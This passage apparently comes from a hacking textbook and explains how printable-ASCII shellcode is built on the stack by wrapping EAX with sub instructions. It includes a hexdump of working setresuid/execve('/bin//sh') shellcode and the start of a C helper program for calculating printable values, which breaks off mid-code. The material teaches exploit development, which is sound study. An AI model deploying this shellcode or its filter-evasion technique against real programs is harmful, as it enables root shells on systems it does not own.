Graphics Programs Reference
In-Depth Information
ESP up (toward lower memory addresses) to the end of the newly pushed
value, ready for the next four bytes of shellcode (shown in italic in the pre-
ceding shellcode). More
sub
instructions are used to wrap EAX around to
0x53e28951,
and this value is then pushed to the stack. As this process is
repeated for each four-byte chunk, the shellcode is built from end to start,
toward the executing loader code.
00000000
31 c0 31
db 31 c9 99
b0 a4 cd 80 6a 0b 58 51 68 |1.1.1......j.XQh|
00000010 2f 2f 73 68 68 2f 62 69 6e 89 e3
51 89 e2 53
89
|//shh/bin..Q..S.|
0
0000020
e1 cd 80
|...|
Eventually, the beginning of the shellcode is reached, but there are only
three bytes (shown in italic in the preceding shellcode) left after pushing
0x99c931db
to the stack. This situation is alleviated by inserting one single-
byte NOP instruction at the beginning of the code, resulting in the value
0x31c03190
being pushed to the stack—
0x90
is machine code for NOP.
Each of these four-byte chunks of the original shellcode is generated
with the printable subtraction method used earlier. The following source
code is a program to help calculate the necessary printable values.
printable_helper.c
#include <stdio.h>
#include <sys/stat.h>
#include <ctype.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#define CHR "%_01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-"
int main(int argc, char* argv[])
{
unsigned int targ, last, t[4], l[4];
unsigned int try, single, carry=0;
int len, a, i, j, k, m, z, flag=0;
char word[3][4];
unsigned char mem[70];
if(argc < 2) {
printf("Usage: %s <EAX starting value> <EAX end value>\n", argv[0]);
exit(1);
}
srand(time(NULL));
bzero(mem, 70);
strcpy(mem, CHR);
len = strlen(mem);
strfry(mem); // Randomize
last = strtoul(argv[1], NULL, 0);
targ = strtoul(argv[2], NULL, 0);
